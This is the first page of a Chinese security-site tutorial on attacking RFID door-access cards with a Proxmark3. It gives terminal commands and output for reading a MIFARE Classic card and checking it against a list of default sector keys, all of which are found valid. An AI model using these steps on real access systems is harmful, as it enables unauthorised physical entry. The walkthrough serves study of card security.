欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

RFID Hacking ④:ProxMark3 破解门禁

来源:本站整理 作者:佚名 时间:2016-07-26 TAG: 我要投稿

国际黑客大会Defcon传统之一:开锁!因为黑客认为锁也是一种安全挑战。我们在黑客题材电影、电视剧中也常常看到:男主女主利用高超的黑客技能侵入目标公司的网络,甚至利用社会工程学突破门禁防护潜入对方办公地点进行物理攻击,如入无人之境。(神盾局、黑客军团、Who am i 貌似都有类似情节)

北上广不相信眼泪 16集
在这一背景下,我们不经思考:门禁系统作为企业物理第一道屏障,这些硬件基础设施安全是否一直都被忽视?
0×01 准备工作

Linux、Windows环境搭建可参考:RFID Hacking②:PM3入门指南 一文。

1.1 进入PM3工作终端
./proxmark3 /dev/ttyACM0
1.2 测试天线
proxmark3> hw tune          # LF antenna: 29.98 V @   125.00 kHz          # LF antenna: 30.39 V @   134.00 kHz          # LF optimal: 36.30 V @   129.03 kHz          # HF antenna: 27.90 V @    13.56 MHz          proxmark3>
1.3 设备固件
proxmark3> hw ver#db# Prox/RFID mark3 RFID instrument                 #db# bootrom: /-suspect 2015-04-02 15:12:04                 #db# os: /-suspect 2015-04-02 15:12:11                 #db# HF FPGA image built on 2015/03/09 at 08:41:42   
0×02 爆破&枚举秘钥
2.1 读取卡片
proxmark3> hf 14a readerATQA : 04 00           UID : 2c f0 55 0b            SAK : 08 [2]          TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1          proprietary non iso14443a-4 card found, RATS not supported
2.2 执行NESTED攻击,枚举&爆破key:
proxmark3> hf mf chk *1 ? tNo key specified,try default keys          chk default key[0] ffffffffffff          chk default key[1] 000000000000          chk default key[2] a0a1a2a3a4a5          chk default key[3] b0b1b2b3b4b5          chk default key[4] aabbccddeeff          chk default key[5] 4d3a99c351dd          chk default key[6] 1a982c7e459a          chk default key[7] d3f7d3f7d3f7          chk default key[8] 714c5c886e97          chk default key[9] 587ee5f9350f          chk default key[10] a0478cc39091          chk default key[11] 533cb6c723f6          chk default key[12] 8fd0a4f256e9          --SectorsCnt:0 block no:0x03 key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:1 block no:0x07 key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:2 block no:0x0b key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:3 block no:0x0f key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:4 block no:0x13 key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:5 block no:0x17 key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:6 block no:0x1b key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:7 block no:0x1f key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:8 block no:0x23 key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:9 block no:0x27 key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:10 block no:0x2b key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:11 block no:0x2f key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:12 block no:0x33 key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:13 block no:0x37 key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:14 block no:0x3b key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:15 block no:0x3f key type:A key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:0 block no:0x03 key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:1 block no:0x07 key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:2 block no:0x0b key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:3 block no:0x0f key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:4 block no:0x13 key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:5 block no:0x17 key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:6 block no:0x1b key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:7 block no:0x1f key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:8 block no:0x23 key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:9 block no:0x27 key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:10 block no:0x2b key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:11 block no:0x2f key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:12 block no:0x33 key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:13 block no:0x37 key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:14 block no:0x3b key type:B key count:13           Found valid key:[ffffffffffff]          --SectorsCnt:15 block no:0x3f key type:B key count:13           Found valid key:[ffffffffffff]          proxmark3>

[1] [2] [3] [4] [5] [6] [7]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载